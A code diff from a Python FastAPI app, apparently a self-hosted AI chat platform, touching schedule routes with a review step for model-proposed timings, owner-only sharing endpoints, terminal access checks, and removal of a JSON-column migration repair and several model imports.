"row": row,
|
||||
"summary": rule_service.describe(row.rule_json or {}, zone=zone),
|
||||
"next": clock.as_utc(row.next_fire_at).astimezone(zone)
|
||||
if row.next_fire_at
|
||||
else None,
|
||||
}
|
||||
for row in rows
|
||||
],
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.get("/scheduled/new")
|
||||
async def new_schedule(request: Request, db: Db, user: RequiredUser, error: str = ""):
|
||||
"""One question: what do you want to schedule?
|
||||
|
||||
The detail comes from the compile. The manual form is on the same page
|
||||
behind a disclosure, so somebody who already knows exactly when it should
|
||||
run does not have to describe it in prose and hope.
|
||||
"""
|
||||
return render(
|
||||
request,
|
||||
"schedules/new.html",
|
||||
{**_context(db, user, None, error=error), "compiled": None, "described": ""},
|
||||
)
|
||||
|
||||
|
||||
@router.post("/api/schedules/describe")
|
||||
async def describe_schedule(request: Request, db: Db, user: RequiredUser):
|
||||
"""Work a plain-language request into a schedule, and show it back.
|
||||
|
||||
Deliberately a *review* step rather than creating the schedule outright.
|
||||
The whole point of the compile is that a model chose the timing, and a
|
||||
timing nobody looked at is exactly the standing instruction this codebase
|
||||
refuses to create silently elsewhere.
|
||||
|
||||
Nothing here can fail into an error page: a cleared fragment, an endpoint
|
||||
that is down, prose instead of JSON and a rule that means nothing all end at
|
||||
the same place, which is the form with the reader's own words in it and a
|
||||
line saying what to finish.
|
||||
"""
|
||||
from lembas.services import prompts as prompts_service
|
||||
from lembas.services.schedule import compile as compile_service
|
||||
|
||||
form = await request.form()
|
||||
described = str(form.get("request") or "").strip()
|
||||
|
||||
template = prompts_service.resolve(db, "task.schedule_compile")
|
||||
resolved = compile_service.endpoint_for(db, user)
|
||||
if resolved is None:
|
||||
compiled = compile_service.Compiled(
|
||||
instruction=described,
|
||||
title=described[:80],
|
||||
reason="There is no model configured to work this out, so fill it in yourself.",
|
||||
)
|
||||
else:
|
||||
endpoint, model_id = resolved
|
||||
compiled = await compile_service.compile_request(
|
||||
endpoint, model_id, described, template=template, user=user
|
||||
)
|
||||
|
||||
context = _context(db, user, None)
|
||||
# The compiled values become the form's values, so the reader edits what the
|
||||
# model proposed rather than being shown it beside an empty form.
|
||||
context["form"] = _form_values(compiled=compiled)
|
||||
return render(
|
||||
request,
|
||||
"schedules/new.html",
|
||||
{
|
||||
**context,
|
||||
"compiled": compiled,
|
||||
"described": described,
|
||||
"summary": rule_service.describe(compiled.rule, zone=clock.zone_for(user))
|
||||
if compiled.rule
|
||||
else "",
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.get("/scheduled/{schedule_id}/edit")
|
||||
async def edit_schedule(
|
||||
request: Request, db: Db, user: RequiredUser, schedule_id: str, error: str = ""
|
||||
):
|
||||
schedule = schedules_service.get(db, schedule_id, user)
|
||||
if schedule is None:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That schedule is not available.")
|
||||
return render(request, "schedules/edit.html", _context(db, user, schedule, error=error))
|
||||
|
||||
|
||||
# --- Writing --------------------------------------------------------------------
|
||||
@router.post("/api/schedules")
|
||||
async def create_schedule(request: Request, db: Db, user: RequiredUser) -> Response:
|
||||
form = await request.form()
|
||||
try:
|
||||
schedule = schedules_service.create(
|
||||
db,
|
||||
owner=user,
|
||||
title=str(form.get("title") or ""),
|
||||
instruction=str(form.get("instruction") or ""),
|
||||
request=str(form.get("instruction") or ""),
|
||||
rule=_rule_from_form(form),
|
||||
target=str(form.get("target") or TARGET_CHAT),
|
||||
model_id=str(form.get("model_id") or ""),
|
||||
)
|
||||
except schedules_service.ScheduleError as error:
|
||||
# Back to the form with the reason, rather than a 400 nobody can act on.
|
||||
return RedirectResponse(
|
||||
f"/scheduled/new?error={error}", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
return RedirectResponse(f"/chat/{schedule.chat_id}", status_code=status.HTTP_303_SEE_OTHER)
|
||||
|
||||
|
||||
@router.post("/api/schedules/{schedule_id}")
|
||||
async def save_schedule(
|
||||
request: Request, db: Db, user: RequiredUser, schedule_id: str
|
||||
) -> Response:
|
||||
schedule = schedules_service.get(db, schedule_id, user)
|
||||
if schedule is None:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That schedule is not available.")
|
||||
form = await request.form()
|
||||
try:
|
||||
schedules_service.update(
|
||||
db,
|
||||
schedule,
|
||||
owner=user,
|
||||
title=str(form.get("title") or ""),
|
||||
instruction=str(form.get("instruction") or ""),
|
||||
rule=_rule_from_form(form),
|
||||
target=str(form.get("target") or TARGET_CHAT),
|
||||
)
|
||||
except schedules_service.ScheduleError as error:
|
||||
return RedirectResponse(
|
||||
f"/scheduled/{schedule_id}/edit?error={error}",
|
||||
status_code=status.HTTP_303_SEE_OTHER,
|
||||
)
|
||||
return RedirectResponse(f"/chat/{schedule.chat_id}", status_code=status.HTTP_303_SEE_OTHER)
|
||||
|
||||
|
||||
@router.post("/api/schedules/{schedule_id}/toggle")
|
||||
async def toggle_schedule(
|
||||
db: Db, user: RequiredUser, schedule_id: str, enabled: str = Form("")
|
||||
) -> Response:
|
||||
schedule = schedules_service.get(db, schedule_id, user)
|
||||
if schedule is None:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That schedule is not available.")
|
||||
schedules_service.set_enabled(
|
||||
db, schedule, owner=user, enabled=enabled not in ("", "0", "false")
|
||||
)
|
||||
return RedirectResponse(
|
||||
f"/chat/{schedule.chat_id}", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
|
||||
|
||||
@router.post("/api/schedules/{schedule_id}/run")
|
||||
async def run_schedule(db: Db, user: RequiredUser, schedule_id: str) -> Response:
|
||||
"""Fire it now, without consuming the run it was scheduled for.
|
||||
|
||||
`runner.run_now` is a different entry point from the ticker's for exactly
|
||||
that reason -- testing a schedule must not skip the real one.
|
||||
"""
|
||||
schedule = schedules_service.get(db, schedule_id, user)
|
||||
if schedule is None:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That schedule is not available.")
|
||||
chat_id = schedule.chat_id
|
||||
await runner.run_now(schedule_id)
|
||||
return RedirectResponse(f"/chat/{chat_id}", status_code=status.HTTP_303_SEE_OTHER)
|
||||
|
||||
|
||||
@router.post("/api/schedules/{schedule_id}/delete")
|
||||
async def delete_schedule(
|
||||
db: Db, user: RequiredUser, schedule_id: str, keep_chat: str = Form("1")
|
||||
) -> Response:
|
||||
schedule = schedules_service.get(db, schedule_id, user)
|
||||
if schedule is None:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That schedule is not available.")
|
||||
schedules_service.delete(db, schedule, keep_chat=keep_chat not in ("", "0", "false"))
|
||||
return RedirectResponse("/scheduled", status_code=status.HTTP_303_SEE_OTHER)
|
||||
@@ -1,176 +0,0 @@
|
||||
"""Giving somebody else access to one thing.
|
||||
|
||||
Its own routes and its own fragment, rather than a block of checkboxes riding
|
||||
along with the resource's save form. Three reasons, in the order they bite:
|
||||
|
||||
- **It rendered every group and every person on the instance, unpaginated, on
|
||||
every detail page.** That is fine for a household and unusable for anything
|
||||
else, and the page it is on has nothing to do with how many accounts exist.
|
||||
- **A share was only stored if the resource was saved.** Ticking a box and
|
||||
navigating away did nothing, silently, which is the shape of failure this
|
||||
codebase keeps cataloguing.
|
||||
- Sharing a *report* has no save form to ride along with at all.
|
||||
|
||||
So: search, and each grant is its own POST. The fragment re-renders itself after
|
||||
every change, which is what keeps "who can see this" a thing you read rather
|
||||
than a thing you reconstruct from checkboxes.
|
||||
|
||||
**Only the owner may reach any of it.** Somebody a thing was shared with cannot
|
||||
share it on -- that is what keeps "who can see this?" answerable by asking one
|
||||
person -- and the check is `sharing.can_write`, which is ownership and nothing
|
||||
else.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
|
||||
from fastapi import APIRouter, Form, HTTPException, Request, Response, status
|
||||
from sqlalchemy import or_, select
|
||||
|
||||
from lembas.api.deps import Db, RequiredUser
|
||||
from lembas.db.models import (
|
||||
PRINCIPAL_GROUP,
|
||||
PRINCIPAL_USER,
|
||||
Group,
|
||||
KnowledgeBase,
|
||||
Note,
|
||||
Report,
|
||||
Skill,
|
||||
User,
|
||||
)
|
||||
from lembas.security import permissions
|
||||
from lembas.services import sharing
|
||||
from lembas.web.templating import render
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(prefix="/api/library/share", tags=["sharing"])
|
||||
|
||||
# What a URL may name, and what it resolves to. A fixed table rather than a
|
||||
# lookup by string on `sharing.RESOURCE_TYPES`, because that one maps class to
|
||||
# string and this needs the other direction -- and because a route segment is
|
||||
# request input, so the set of things it may name belongs written down.
|
||||
KINDS: dict[str, type] = {
|
||||
"base": KnowledgeBase,
|
||||
"note": Note,
|
||||
"skill": Skill,
|
||||
"report": Report,
|
||||
}
|
||||
|
||||
# Candidates offered at once. Enough that a small instance never has to type
|
||||
# anything, few enough that a large one is not a page of names.
|
||||
MAX_CANDIDATES = 12
|
||||
|
||||
|
||||
def _resource(db: Db, kind: str, resource_id: str, user: User):
|
||||
model = KINDS.get(kind)
|
||||
if model is None:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "Not a shareable kind.")
|
||||
resource = db.get(model, resource_id)
|
||||
# Ownership, not readability. Being able to see a thing is not being able to
|
||||
# give it away, and the 404 rather than a 403 is deliberate: somebody who
|
||||
# cannot share it has no business learning whether it exists.
|
||||
if resource is None or not sharing.can_write(resource, user):
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That is not yours to share.")
|
||||
return resource
|
||||
|
||||
|
||||
def _panel(request: Request, db: Db, user: User, kind: str, resource, q: str = "") -> Response:
|
||||
grants = sharing.grants_for(db, resource)
|
||||
shared_users = [g.principal_id for g in grants if g.principal_type == PRINCIPAL_USER]
|
||||
shared_groups = [g.principal_id for g in grants if g.principal_type == PRINCIPAL_GROUP]
|
||||
|
||||
needle = q.strip()
|
||||
pattern = f"%{needle}%"
|
||||
group_query = select(Group).order_by(Group.name)
|
||||
people_query = select(User).where(User.id != user.id).order_by(User.name)
|
||||
if needle:
|
||||
group_query = group_query.where(Group.name.ilike(pattern))
|
||||
people_query = people_query.where(
|
||||
or_(User.name.ilike(pattern), User.email.ilike(pattern))
|
||||
)
|
||||
|
||||
# Anything already shared is shown whatever the search says, or the only way
|
||||
# to remove a grant would be to search for the name it was given to.
|
||||
groups = list(db.scalars(group_query.limit(MAX_CANDIDATES)))
|
||||
people = list(db.scalars(people_query.limit(MAX_CANDIDATES)))
|
||||
for existing in db.scalars(select(Group).where(Group.id.in_(shared_groups or [""]))):
|
||||
if existing.id not in {g.id for g in groups}:
|
||||
groups.insert(0, existing)
|
||||
for existing in db.scalars(select(User).where(User.id.in_(shared_users or [""]))):
|
||||
if existing.id not in {p.id for p in people}:
|
||||
people.insert(0, existing)
|
||||
|
||||
return render(
|
||||
request,
|
||||
"library/_share_panel.html",
|
||||
{
|
||||
"kind": kind,
|
||||
"resource": resource,
|
||||
"q": needle,
|
||||
"groups": groups,
|
||||
"people": people,
|
||||
"shared_users": shared_users,
|
||||
"shared_groups": shared_groups,
|
||||
"share_count": len(grants),
|
||||
# Whether the lists were cut, so the panel can say "search for
|
||||
# somebody" rather than implying these are all the names there are.
|
||||
"truncated": len(people) >= MAX_CANDIDATES or len(groups) >= MAX_CANDIDATES,
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.get("/{kind}/{resource_id}")
|
||||
async def share_panel(
|
||||
request: Request, db: Db, user: RequiredUser, kind: str, resource_id: str, q: str = ""
|
||||
) -> Response:
|
||||
resource = _resource(db, kind, resource_id, user)
|
||||
if not permissions.has(db, user, "library.share"):
|
||||
raise HTTPException(status.HTTP_403_FORBIDDEN, "You may not share things.")
|
||||
return _panel(request, db, user, kind, resource, q)
|
||||
|
||||
|
||||
@router.post("/{kind}/{resource_id}")
|
||||
async def set_share(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: RequiredUser,
|
||||
kind: str,
|
||||
resource_id: str,
|
||||
principal_type: str = Form(""),
|
||||
principal_id: str = Form(""),
|
||||
on: bool = Form(False),
|
||||
q: str = Form(""),
|
||||
) -> Response:
|
||||
"""Add or remove one grant, and answer with the panel.
|
||||
|
||||
One grant per request rather than a submitted set, because the set is what
|
||||
made the old panel need every name on the instance in front of you before
|
||||
you could change one of them.
|
||||
"""
|
||||
resource = _resource(db, kind, resource_id, user)
|
||||
if not permissions.has(db, user, "library.share"):
|
||||
raise HTTPException(status.HTTP_403_FORBIDDEN, "You may not share things.")
|
||||
if principal_type not in (PRINCIPAL_USER, PRINCIPAL_GROUP):
|
||||
raise HTTPException(status.HTTP_400_BAD_REQUEST, "Unknown principal.")
|
||||
|
||||
grants = sharing.grants_for(db, resource)
|
||||
users = [g.principal_id for g in grants if g.principal_type == PRINCIPAL_USER]
|
||||
groups = [g.principal_id for g in grants if g.principal_type == PRINCIPAL_GROUP]
|
||||
target = users if principal_type == PRINCIPAL_USER else groups
|
||||
|
||||
# Validated against what exists, so a crafted id cannot write a grant naming
|
||||
# nothing -- which would be invisible in the panel and unremovable from it.
|
||||
exists = db.get(User if principal_type == PRINCIPAL_USER else Group, principal_id)
|
||||
if on and exists is not None and principal_id not in target:
|
||||
target.append(principal_id)
|
||||
elif not on and principal_id in target:
|
||||
target.remove(principal_id)
|
||||
|
||||
sharing.set_grants(db, resource, user_ids=users, group_ids=groups)
|
||||
log.info(
|
||||
"%s %s %s %s with %s", user.email, "shared" if on else "unshared", kind,
|
||||
resource_id, principal_id,
|
||||
)
|
||||
return _panel(request, db, user, kind, resource, q)
|
||||
@@ -35,7 +35,6 @@ from lembas.db.session import session_scope
|
||||
from lembas.security import permissions
|
||||
from lembas.security.sessions import COOKIE_NAME, resolve_session
|
||||
from lembas.services import settings_store
|
||||
from lembas.services.agent import draft as draft_service
|
||||
from lembas.services.agent import session as agent_session
|
||||
from lembas.services.agent import terminal as terminal_service
|
||||
from lembas.services.agent.base import ExecError
|
||||
@@ -76,20 +75,6 @@ def _same_origin(websocket: WebSocket) -> bool:
|
||||
return urlsplit(origin).netloc.lower() == host.lower()
|
||||
|
||||
|
||||
def _chat_or_draft(db, user, chat_id: str):
|
||||
"""The chat this panel belongs to, real or still being decided.
|
||||
|
||||
A draft resolves to a transient `Chat` -- see services/agent/draft.py --
|
||||
which is what lets the terminal open on the new-chat screen without
|
||||
`_prepare` or `agent_session.resolve` learning that drafts exist.
|
||||
"""
|
||||
if draft_service.is_draft(chat_id):
|
||||
draft = draft_service.get(chat_id, user.id)
|
||||
return draft_service.as_chat(draft) if draft is not None else None
|
||||
chat = db.get(Chat, chat_id)
|
||||
return chat if chat is not None and chat.user_id == user.id else None
|
||||
|
||||
|
||||
def _prepare(db, user, chat_id: str) -> tuple[str, dict]:
|
||||
"""Everything that has to be true, and what opening needs. One or the other.
|
||||
|
||||
@@ -100,8 +85,8 @@ def _prepare(db, user, chat_id: str) -> tuple[str, dict]:
|
||||
if not permissions.has(db, user, "agent.terminal"):
|
||||
return "You do not have permission to open a terminal.", {}
|
||||
|
||||
chat = _chat_or_draft(db, user, chat_id)
|
||||
if chat is None:
|
||||
chat = db.get(Chat, chat_id)
|
||||
if chat is None or chat.user_id != user.id:
|
||||
return "That chat no longer exists.", {}
|
||||
if chat.kind != KIND_AGENT:
|
||||
return "This is an ordinary chat, so it has no machine to open a shell on.", {}
|
||||
@@ -220,7 +205,8 @@ async def last_command(db: Db, user: RequiredUser, chat_id: str) -> dict:
|
||||
buffer could not produce it anyway: it holds what is on screen, hard-wrapped
|
||||
at the terminal's width, with no way to tell a wrap from a newline.
|
||||
"""
|
||||
if _chat_or_draft(db, user, chat_id) is None:
|
||||
chat = db.get(Chat, chat_id)
|
||||
if chat is None or chat.user_id != user.id:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That chat no longer exists.")
|
||||
if not permissions.has(db, user, "agent.terminal"):
|
||||
raise HTTPException(status.HTTP_403_FORBIDDEN, "You cannot open a terminal.")
|
||||
|
||||
@@ -38,22 +38,6 @@ class Settings(BaseSettings):
|
||||
session_ttl: int = 60 * 60 * 24 * 30
|
||||
request_timeout: float = 300.0
|
||||
|
||||
# What `/admin/updates` compares against and the helper deploys.
|
||||
#
|
||||
# Deployment configuration and deliberately not instance settings: they
|
||||
# decide what code runs on this machine, and a value a web administrator
|
||||
# could edit would turn "you may deploy the channel" into "you may deploy
|
||||
# anything". `deploy/install.sh` writes both beside the rest.
|
||||
#
|
||||
# `stable` follows the newest release tag; `edge` follows the branch tip.
|
||||
# Stable is the default because a branch tip is not a release -- following
|
||||
# one means deploying whatever was pushed five minutes ago, which is right
|
||||
# for whoever is building this and wrong for whoever is running it.
|
||||
update_channel: Literal["stable", "edge"] = "stable"
|
||||
# Which branch is fetched, and which one `edge` follows. Stable needs it too:
|
||||
# a fetch has to name a branch, and tags come down with it.
|
||||
update_branch: str = "main"
|
||||
|
||||
@model_validator(mode="after")
|
||||
def _generate_secret_if_absent(self) -> Settings:
|
||||
# A generated key lets `lembas serve` work with no configuration at all,
|
||||
|
||||
@@ -39,29 +39,6 @@ log = logging.getLogger(__name__)
|
||||
MANUAL_STEPS: list[str] = []
|
||||
|
||||
|
||||
def _default_shape(column: Column) -> type | None:
|
||||
"""`list` or `dict`, from the column's own Python-side default.
|
||||
|
||||
`default=list` and `default=dict` are how the two JSON flavours are
|
||||
declared, and SQLAlchemy keeps the callable. Calling it is cheap and is the
|
||||
only way to tell a MutableList column from a MutableDict one -- see the note
|
||||
in `_literal_default`.
|
||||
"""
|
||||
default = column.default
|
||||
if default is None or not getattr(default, "is_callable", False):
|
||||
return None
|
||||
try:
|
||||
# SQLAlchemy wraps a zero-argument callable to take a context.
|
||||
produced = default.arg(None)
|
||||
except Exception: # noqa: BLE001 - a default we cannot call tells us nothing
|
||||
return None
|
||||
if isinstance(produced, list):
|
||||
return list
|
||||
if isinstance(produced, dict):
|
||||
return dict
|
||||
return None
|
||||
|
||||
|
||||
def _literal_default(column: Column) -> str | None:
|
||||
"""A SQL literal to backfill an existing row's new column with.
|
||||
|
||||
@@ -86,22 +63,8 @@ def _literal_default(column: Column) -> str | None:
|
||||
if "JSON" in affinity:
|
||||
# MutableList columns must start as [] and MutableDict as {}; guessing
|
||||
# wrong makes the first read blow up rather than return empty.
|
||||
#
|
||||
# 🚨 NOT `column.type.python_type`. `MutableList.as_mutable(JSON)`
|
||||
# returns the *same* JSON type object with an event listener attached --
|
||||
# it does not subclass or wrap it -- so the type cannot tell you which
|
||||
# of the two it is, and `JSON.python_type` is `dict` for both. That read
|
||||
# as "this is a dict column" for every list column, and the first one
|
||||
# ever added by a migration (`Model.reasoning_efforts`, 1.2.0) arrived
|
||||
# as `'{}'` on every existing row. `MutableList` refuses a dict, so the
|
||||
# failure was not an empty list but a ValueError on *load* -- every page
|
||||
# that lists models, 500, on an instance that had simply been updated.
|
||||
#
|
||||
# The Python-side default is the only honest signal: a JSONList column
|
||||
# is declared `default=list` and a JSONDict one `default=dict`, and
|
||||
# calling it says which. Anything that cannot be called or produces
|
||||
# neither falls back to `{}`, which is what this always assumed.
|
||||
return "'[]'" if _default_shape(column) is list else "'{}'"
|
||||
python_type = getattr(column.type, "python_type", None)
|
||||
return "'[]'" if python_type is list else "'{}'"
|
||||
if "BOOL" in affinity:
|
||||
return "0"
|
||||
if any(token in affinity for token in ("INT", "FLOAT", "NUMERIC", "DECIMAL")):
|
||||
@@ -158,7 +121,6 @@ FTS_INDEXES: tuple[tuple[str, str, tuple[str, ...]], ...] = (
|
||||
("documents_fts", "documents", ("title", "description", "extracted_text")),
|
||||
("notes_fts", "notes", ("title", "body")),
|
||||
("skills_fts", "skills", ("name", "description", "body")),
|
||||
("reports_fts", "reports", ("title", "summary", "body")),
|
||||
)
|
||||
|
||||
|
||||
@@ -227,50 +189,6 @@ def ensure_fts(engine: Engine) -> list[str]:
|
||||
return created
|
||||
|
||||
|
||||
def repair_json_shapes(engine: Engine) -> list[str]:
|
||||
"""Put right any JSON column backfilled with the wrong empty value.
|
||||
|
||||
`_literal_default` used to read the shape off `column.type.python_type`,
|
||||
which is `dict` for a MutableList column as well as a MutableDict one -- so
|
||||
the first list-shaped JSON column ever added by a migration arrived as
|
||||
`'{}'` on every row that already existed. `MutableList` refuses a dict, and
|
||||
refuses it while *loading*, so the symptom was not an empty list but a
|
||||
`ValueError` and a 500 on every page that touched the table.
|
||||
|
||||
Converges, like `ensure_fts` beside it: it runs on every start, it is
|
||||
idempotent, and on a database that was never damaged it does nothing. Only
|
||||
the exact wrong value is rewritten -- `'{}'` in a column whose default
|
||||
produces a list -- because `{}` cannot be a legitimate value there, while
|
||||
anything else in that column might be somebody's data.
|
||||
"""
|
||||
fixed: list[str] = []
|
||||
inspector = inspect(engine)
|
||||
known = set(inspector.get_table_names())
|
||||
|
||||
with engine.begin() as connection:
|
||||
for table in Base.metadata.sorted_tables:
|
||||
if table.name not in known:
|
||||
continue
|
||||
for column in table.columns:
|
||||
if "JSON" not in column.type.__class__.__name__.upper():
|
||||
continue
|
||||
if _default_shape(column) is not list:
|
||||
continue
|
||||
result = connection.execute(
|
||||
text(
|
||||
f'UPDATE "{table.name}" SET "{column.name}" = \'[]\' '
|
||||
f'WHERE "{column.name}" = \'{{}}\''
|
||||
)
|
||||
)
|
||||
if result.rowcount:
|
||||
fixed.append(f"{table.name}.{column.name} ({result.rowcount} row(s))")
|
||||
log.warning(
|
||||
"repaired %s.%s on %d row(s): was '{}' in a list column",
|
||||
table.name, column.name, result.rowcount,
|
||||
)
|
||||
return fixed
|
||||
|
||||
|
||||
def sync_schema(engine: Engine) -> list[str]:
|
||||
"""Bring the database up to the declared schema. Returns what it changed."""
|
||||
import lembas.db.models # noqa: F401 (registers every table on the metadata)
|
||||
@@ -300,14 +218,6 @@ def sync_schema(engine: Engine) -> list[str]:
|
||||
changes.append(f"add column {table.name}.{column.name}")
|
||||
log.info("schema: %s", statement)
|
||||
|
||||
# Before the search indexes, and before anything can try to load a row:
|
||||
# a column left holding the wrong empty value makes the ORM raise on read.
|
||||
try:
|
||||
for repair in repair_json_shapes(engine):
|
||||
changes.append(f"repair {repair}")
|
||||
except Exception: # noqa: BLE001 - a repair that fails must not stop a start
|
||||
log.exception("could not repair JSON column shapes")
|
||||
|
||||
try:
|
||||
for index in ensure_fts(engine):
|
||||
changes.append(f"create search index {index}")
|
||||
|
||||
@@ -9,7 +9,6 @@ from lembas.db.models.agent import (
|
||||
AUTH_KEY,
|
||||
AUTH_METHODS,
|
||||
AUTH_PASSWORD,
|
||||
Job,
|
||||
SshProfile,
|
||||
)
|
||||
from lembas.db.models.attachment import (
|
||||
@@ -18,13 +17,9 @@ from lembas.db.models.attachment import (
|
||||
KIND_TEXT,
|
||||
Attachment,
|
||||
)
|
||||
from lembas.db.models.canvas import ScratchDoc
|
||||
from lembas.db.models.chat import (
|
||||
ALL_KINDS,
|
||||
KIND_AGENT,
|
||||
KIND_CHAT,
|
||||
KIND_MESSAGES,
|
||||
KIND_TASK,
|
||||
KINDS,
|
||||
ROLE_ASSISTANT,
|
||||
ROLE_SYSTEM,
|
||||
@@ -35,24 +30,16 @@ from lembas.db.models.chat import (
|
||||
Message,
|
||||
)
|
||||
from lembas.db.models.connection import Connection, Model, model_groups
|
||||
from lembas.db.models.image import ImageWorkflow
|
||||
from lembas.db.models.library import (
|
||||
AUTHOR_MODEL,
|
||||
AUTHOR_USER,
|
||||
CHUNK_DOCUMENT,
|
||||
CHUNK_KINDS,
|
||||
CHUNK_NOTE,
|
||||
CHUNK_REPORT,
|
||||
CHUNK_SKILL,
|
||||
PRINCIPAL_GROUP,
|
||||
PRINCIPAL_USER,
|
||||
RESOURCE_BASE,
|
||||
RESOURCE_NOTE,
|
||||
RESOURCE_REPORT,
|
||||
RESOURCE_SKILL,
|
||||
SOURCE_LINK,
|
||||
SOURCE_UPLOAD,
|
||||
Chunk,
|
||||
Document,
|
||||
KnowledgeBase,
|
||||
Memory,
|
||||
@@ -62,24 +49,6 @@ from lembas.db.models.library import (
|
||||
SkillRevision,
|
||||
chat_knowledge_bases,
|
||||
)
|
||||
from lembas.db.models.persona import Persona, PersonaRevision
|
||||
from lembas.db.models.report import (
|
||||
SOURCE_CHAT,
|
||||
SOURCE_MANUAL,
|
||||
SOURCE_SCHEDULE,
|
||||
SOURCES,
|
||||
Report,
|
||||
)
|
||||
from lembas.db.models.schedule import (
|
||||
ORIGIN_MODEL,
|
||||
ORIGIN_USER,
|
||||
ORIGINS,
|
||||
TARGET_CHAT,
|
||||
TARGET_MESSAGES,
|
||||
TARGET_REPORT,
|
||||
TARGETS,
|
||||
Schedule,
|
||||
)
|
||||
from lembas.db.models.setting import Setting
|
||||
from lembas.db.models.suggestion import Suggestion
|
||||
from lembas.db.models.tool import (
|
||||
@@ -101,36 +70,28 @@ from lembas.db.models.user import (
|
||||
ROLE_ADMIN,
|
||||
ROLE_PENDING,
|
||||
Group,
|
||||
PushSubscription,
|
||||
Session,
|
||||
Usage,
|
||||
User,
|
||||
user_groups,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
"AUTHOR_MODEL",
|
||||
"PushSubscription",
|
||||
"Usage",
|
||||
"AUTH_KEY",
|
||||
"AUTH_METHODS",
|
||||
"AUTH_PASSWORD",
|
||||
"AUTHOR_USER",
|
||||
"ALL_KINDS",
|
||||
"Attachment",
|
||||
"KINDS",
|
||||
"KIND_AGENT",
|
||||
"KIND_CHAT",
|
||||
"KIND_DOCUMENT",
|
||||
"KIND_IMAGE",
|
||||
"KIND_MESSAGES",
|
||||
"KIND_TASK",
|
||||
"KIND_TEXT",
|
||||
"PRINCIPAL_GROUP",
|
||||
"PRINCIPAL_USER",
|
||||
"RESOURCE_BASE",
|
||||
"RESOURCE_NOTE",
|
||||
"RESOURCE_REPORT",
|
||||
"RESOURCE_SKILL",
|
||||
"RESPONSE_JSON",
|
||||
"RESPONSE_MODES",
|
||||
@@ -147,44 +108,20 @@ __all__ = [
|
||||
"SECRET_NONE",
|
||||
"SECRET_PLACEMENTS",
|
||||
"SECRET_QUERY",
|
||||
"ORIGINS",
|
||||
"ORIGIN_MODEL",
|
||||
"ORIGIN_USER",
|
||||
"SOURCES",
|
||||
"SOURCE_CHAT",
|
||||
"SOURCE_LINK",
|
||||
"SOURCE_MANUAL",
|
||||
"SOURCE_SCHEDULE",
|
||||
"SOURCE_UPLOAD",
|
||||
"TARGETS",
|
||||
"TARGET_CHAT",
|
||||
"TARGET_MESSAGES",
|
||||
"TARGET_REPORT",
|
||||
"Report",
|
||||
"Schedule",
|
||||
"Chat",
|
||||
"Job",
|
||||
"Connection",
|
||||
"CustomTool",
|
||||
"CHUNK_DOCUMENT",
|
||||
"CHUNK_KINDS",
|
||||
"CHUNK_NOTE",
|
||||
"CHUNK_REPORT",
|
||||
"CHUNK_SKILL",
|
||||
"Chunk",
|
||||
"Document",
|
||||
"Folder",
|
||||
"Group",
|
||||
"ImageWorkflow",
|
||||
"KnowledgeBase",
|
||||
"McpServer",
|
||||
"Memory",
|
||||
"Persona",
|
||||
"PersonaRevision",
|
||||
"Message",
|
||||
"Model",
|
||||
"Note",
|
||||
"ScratchDoc",
|
||||
"Session",
|
||||
"Setting",
|
||||
"Share",
|
||||
|
||||
@@ -53,20 +53,6 @@ class SshProfile(UUIDPrimaryKey, Timestamps, Base):
|
||||
port: Mapped[int] = mapped_column(Integer, default=22, nullable=False)
|
||||
username: Mapped[str] = mapped_column(String(120), nullable=False)
|
||||
|
||||
# Whether `host` resolved to loopback the last time anybody looked. Written
|
||||
# where a network call is already happening -- saving this connection, and
|
||||
# Check -- and read on every request that asks whether this connection may
|
||||
# be used at all. A column rather than a lookup because that question is
|
||||
# asked several times per page render, and `getaddrinfo` on the request path
|
||||
# makes an agent page wait out a DNS timeout for a host nobody is talking
|
||||
# to. A literal `127.0.0.1` needs none of this and is decided from the
|
||||
# string. See services/agent/hosts.py.
|
||||
#
|
||||
# False on every row an upgrade brings in, which is correct for the literal
|
||||
# case (decided from the string anyway) and optimistic for a *name* until it
|
||||
# is next saved or checked.
|
||||
resolves_here: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
|
||||
|
||||
auth: Mapped[str] = mapped_column(String(16), default=AUTH_KEY, nullable=False)
|
||||
password_encrypted: Mapped[str] = mapped_column(Text, default="")
|
||||
private_key_encrypted: Mapped[str] = mapped_column(Text, default="")
|
||||
@@ -114,34 +100,4 @@ class SshProfile(UUIDPrimaryKey, Timestamps, Base):
|
||||
return f"<SshProfile {self.name} {self.address}>"
|
||||
|
||||
|
||||
class Job(Timestamps, Base):
|
||||
"""A command left running on the far side after the reply that started it.
|
||||
|
||||
The durable record behind `services/agent/jobs.py`, which otherwise keeps
|
||||
only an in-process registry lost on restart. A background job runs for
|
||||
minutes to hours with nobody watching -- exactly the case a restart must not
|
||||
forget -- so the row lets a startup hook re-poll the job's deterministic
|
||||
exit-file and wake the model as if nothing had happened.
|
||||
|
||||
The id is `jobs`'s own short hex, not a UUIDPrimaryKey, because the same id
|
||||
names the files on the machine and is quoted back by the model.
|
||||
"""
|
||||
|
||||
__tablename__ = "agent_jobs"
|
||||
|
||||
id: Mapped[str] = mapped_column(String(32), primary_key=True)
|
||||
chat_id: Mapped[str] = mapped_column(
|
||||
String(32), ForeignKey("chats.id", ondelete="CASCADE"), index=True, nullable=False
|
||||
)
|
||||
command: Mapped[str] = mapped_column(Text, default="")
|
||||
# running | done | killed | lost. `lost` means it stopped without an exit
|
||||
# code being recorded -- killed out of band, or the host rebooted under it.
|
||||
status: Mapped[str] = mapped_column(String(16), default="running", nullable=False)
|
||||
